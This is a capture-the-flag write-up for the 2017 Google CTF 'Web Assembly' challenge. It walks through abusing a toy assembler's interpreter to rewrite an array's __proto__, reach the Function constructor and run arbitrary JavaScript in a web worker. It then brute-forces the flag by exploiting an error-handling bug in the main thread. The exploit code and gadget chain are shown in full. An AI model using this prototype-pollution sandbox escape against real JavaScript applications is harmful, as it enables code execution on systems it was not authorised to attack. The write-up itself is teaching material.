Google CTF - Web Assembly

Just pass the flag test.
https://asm.web.ctfcompetition.com/

Screen-Shot-2017-06-21-at-17.20.10

TL;DR

Due to the bug in an assembler interpreter it was possible to read/write arrays methods, we exploited this to rewrite __proto__ and get JS code execution inside the isolated worker. The worker exploited a bug in the main thread to skip incorrect guesses on the flag's letters. As a result, correct letters are printed.

Application

If you want to play with the application on your own and the original application is not running, here is the source:

On the page we see a fancy assembler IDE. Let's check the source code.

Intro

The code of the pages is minified, we can use http://jsbeautifier.org to get a lot more beautiful code. However, 24 hours after the start nobody has solved the task so a hint was released. Besides a fulfilling 1 word 'constructor', there was non-minified source code attached. In this writeup, for the sake of easy-to-readness, we will analyze the latter code.

Overview

Workflow with the application is as following: after writing your code, compile button should be pressed. Next, you should choose a testset for your compiled program program to run against. A testset contains multiple tests, each have some input and a correct answer. To pass a test, a program must return the expected answer using ret instruction.

If all tests in a testset finished successfully, you are asked to send your compiled code (this is really important) to the server, where it would be ran against the same testset, but on the server side (in fact, it is run in a Chrome browser, where the flag variable is set). The output of the program will be compared to the correct answer, and if matches, shown to user.

The target is to pass the testset called "flag". In this testset, each test has no input and a letter of the flag as correct answer.

As all possible programs are deterministic, it's obvious that it will produce same output when ran without input. That means that there's no way to pass the testset without some sort of hacking (surprise!).

Compilation

The code consists of two sections: data and code.

Data

Data has the following format:

<data> ::= <variable_name> <type> <value>
<variable_name> ::= "$" <string>
<type> ::= "int" | "float" | "string" | "mem"
<value> ::= <integer> | <string>

The data section is compiled via the following code:

switch (u) {
    case "string":
        parsedData = [8].concat(stringToInternal(f));
        break;
    case "int":
        parsedData = [4].concat(intToInternal(f | 0));
        break;
    case "float":
        parsedData = [7].concat(Array.from(new Uint8Array((new Float64Array([Number(f)])).buffer)));
        break;
    case "mem":
        for (currrentMemLength = 0; a < Number(requiredMemLength); currrentMemLength += 4) parsedData.push(0, 0, 127, 127);
        break;
    default:
        throw Error("Error parsing " + a);
}

So the compiled piece of data has its type in the first element (with index 0) and some internal representation of the data itself in the remaining elements. To solve the task, the exact layout of the compiled data is not really important, so we don't focus on that.

Code

The code format is as follows (we omit the jump labels as we didn't need them in our solution, but still there was such a possibility):

<code> ::= <command> <to_variable> <aux_variable>
<to_variable> ::= <to_inline_variable> | <data_section_variable>
<to_inline_variable> ::= "int" | "float" <value>
<aux_variable> ::= <aux_inline_variable> | <data_section_variable>
<aux_inline_variable> ::= "int" | "float" | "string"  <value>
<data_section_variable> ::= "$" <variable_name>

Our assembler always has two arguments. The following instructions are supported: mov cmp jlz jgz jnz jez ret add sub mul div mod and orr xor not shl shr prt get. Okay, what are the arguments for e.x. mov? The first argument is an offset in an array of all variables that you have defined in the data section. The second argument is the data that you want to put. So, for example,

.data
$a int 1
.code
mov int 0 string abc

will put abc to the first variable.

Let's get back to the definitions of code. Note that the compiler does not allow to_inline_variable to be of string type. But is that constraint forced in the code?

String(code).replace(/^\s*(([a-z]{3})\s+(?:(int|float)?\s*(\S+))(?:\s*(?:(int|float|string)?\s*(.+))))/img, 
    function(totalMatch, instruction, toType, toValue, auxType, auxValue) {
        else {
            parseData = function(variableType, variableValue, d) {
                switch (variableType) {
                    case "int":
                        compiledCode.push([4], (variableValue));
                        break;
                    case "float":
                        compiledCode.push([7], Array.from(new Uint8Array((new Float64Array([variableValue])).buffer)));
                        break;
                    case "string":
                        compiledCode.push([8], p(variableValue));
                        break;
                    default:
                        compiledCode.push([(d ? 128 : 0) + 5], new Uint8Array(c.labels[variableValue].buffer)) // this occurs when no type was specified, thus we face a variable. The value will need to be derefenced before being used
                }
            };
            var instructionOffset = predefinedInstructions.indexOf(instruction);
            compiledCode.push([instructionOffset]);
            parseData(toType, toValue, false);
            parseData(auxType, auxValue, true);
    }
});

The regex from the code forbids the first type to be string, but let's modify it:

-  /^\s*(([a-z]{3})\s+(?:(int|float)?\s*(\S+))(?:\s*(?:(int|float|string)?\s*(.+))))/img  
+  /^\s*(([a-z]{3})\s+(?:(int|float|string)?\s*(\S+))(?:\s*(?:(int|float|string)?\s*(.+))))/img

Okay, now we can legitimately compile the code that has the first argument of type 'string'. That would probably help a lot, as, imagine, we have an array called memory which keeps all the data, now when we do mov int 1 string abc, the code would like like this memory[1] = 'abc'. But now we can compile a program where we put a string instead of integer as an index. For example, mov string toString string abc would result in memory['toString'] = 'abc'. Looks interesting. But would that compiled code successfully execute on the server side? Shall see that a bit later.

String "dereferencing"

Let's look at the function that processes bytecode for command arguments:

function consumeValue(buffer) {
  var bytes = new Uint8Array(buffer);
  var tag = bytes[0] & 0x7F;
  var pointer = bytes[0] >> 7;
  var type = types[tag];
  var value;
  if (type) {
    var bitSize = type.replace(/\D+/g, '');
    var end;
    if (bitSize) {
      end = 1 + bitSize / 8;
    }
    var view = new self[type + 'Array'](buffer.slice(1, end));
    if (!bitSize) {
      bitSize = 32 + 16 * view[0].length;
    }
    if (pointer) {
      value = function(memory) {
        return memory[view[0]];
      };
    } else {
      value = view[0];
    }
    var newBuffer = new Uint8Array(buffer.slice(1 + bitSize / 8));
    var paddingLength = 0;
    while (newBuffer[paddingLength] === 0x7F) {
      paddingLength++;
    }
    return {
      value: value,
      newOffset: 1 + bitSize / 8 + paddingLength,
    };
  }
  throw new VMError('Invalid Type');
}

The first byte (bytes[0]) keeps the type of the value. From the code it's clear that the most significant bit determines if the value is a "pointer", while the rest bits keep the type of the value. Moreover, every combination of (pointer/non-pointer, type) is possible. What if we introduce a new type, string pointer? Well, as all pointers are dereferenced in runtime using memory[view[0]] construction, this will give us access to all properties of the memory object, including some as nice as __proto__, constructor and so on.

From now we'll refer to this string pointer type as hui.

Another thing to note is how the instruction arguments are resolved at runtime. It's done by getValue function:

function getValue(value, memory) {
  try {
    return getValue(value(memory), memory);
  } catch (e) {
    return value;
  }
}

The function is recursive, and it actually tries to call the value to check whether it's a function. This means that we can call every function we can access (using variables, indices or our hui "string pointers")! But the argument of the function is fixed, it is the memory itself.

Executing code as worker

After the code has been compiled, it is locally run against testset. Each test is ran inside it's own worker which uses postMessage to send back results of the execution. Then the worker's result is compared to the expected one. To get the flag, one should pass flag.length tests. Each worker should return one corresponding letter of the flag. However, no input is provided to the worker, meanwhile your code is run in the browser (but on the remote server), that's why our goal is to gain javascript code execution in worker's context.

Let's sum up what we have done at the moment:

  1. We can change properties of the memory object using string <property> as first argument of the mov instruction.
  2. We can read properties of the memory object using our new hui type.
  3. We can call any function that lies in memory (both: memory property and an element in the array) with a single argument which will be memory itself.

Let's leave it for a while and look at the following code:

// memory is an Array
var orig_proto = memory.__proto__;   // backup original __proto__
/*1*/ memory.__proto__ = memory.pop;  // now __proto__ is some function

/*2*/ var f = memory.constructor; // as the __proto__ is a function,      
                                      // the  constructor of it is Function 

memory.__proto__ = orig_proto;       // restore original __proto__

memory[0] = 'alert(1)';         // code to execute
memory[1] = '1/*';
memory[100500] = '*/';

/*3*/ f(memory)(memory); // construct and call Function(memory), 
                                 // which is equivalent to 
                                 // calling Function(memory.toString())

In /*1*/, we replace __proto__ of the array with some function. Due to javascript's prototyping system, that means that when we access memory.constructor in /*2*/, we'll get the Function, not Array. Then, in /*3*/, we call the constructor with memory as an argument, and memory.toString() will look like this:

alert(1),1/*blah,blah,blah,,,,,,,,*/
``` which is correct javascript code, that will execute `alert(1)`.

Luckily, we can reproduce this code in our "assembler" using the primitives we described earlier:

```asm
.data
$code string alert(1)
$comm string 1/*
$proto string 1
$constr string 1
$res string 1
.code

&main:

mov int 100500  string */
mov $proto hui __proto__
mov string __proto__ hui pop
mov $constr hui constructor
mov string __proto__ $proto
mov $res $constr

This code uses .data section instead of assignment to memory[0] and memory[1], but the rest is the same.

Using exception to ignore errors

Let's now look at the code that processes messages sent by a worker:

...

function TestCaseError(data) {
  Error.call(this, this.message = 'Wrong answer on test ' + data.test);
}
TestCaseError.prototype = Error.prototype;

...

  worker.onmessage = function(e) {
    if (e.data['answer'] == test[1]) {
      resolve(e.data);
    } else {
      reject(new TestCaseError(e.data));
    }
    worker.terminate();
  };
...

(here resolve and reject are corresponding functions of the Promise that handles test result).

As we can execute code as a worker, we can send as much arbitrary messages as we want. That will be great if the correct answer would be accepted (by calling resolve) and the wrong would be ignored. We can achieve this by sending something that can't be casted to string when referenced as data.test: if we do so, the exception will be thrown inside TestCaseError, and neither reject not worker.terminate() will not be called.

Full solution scenario

Combining all together, we do the following:

  1. Compile nice code that uses hui type and string indices to gain code execution inside workers' context and send it to the server for testing on "flag" testset.
  2. Being a worker, we bruteforce characters by sending postMessage({"answer":flag_character_guess, "test": {"toString":0}}).
  3. Incorrect guesses are ignored by onmessage because of the uncaught exception in TestCaseError.
  4. The correct one will resolve the promise.
  5. As we mentioned above, in case of successful execution against all tests, the answers (which are characters of the flag) are shown back to us, so we'll see the flag.

The flag was C,T,F,{,_,r,3,m,0,v,3,_,t,h,3,_,c,0,m,m,4,s,_,p,l,z,_,k,t,h,x,b,y,e,_,} (the commas appeared because it was the separator between the answers to individual tests).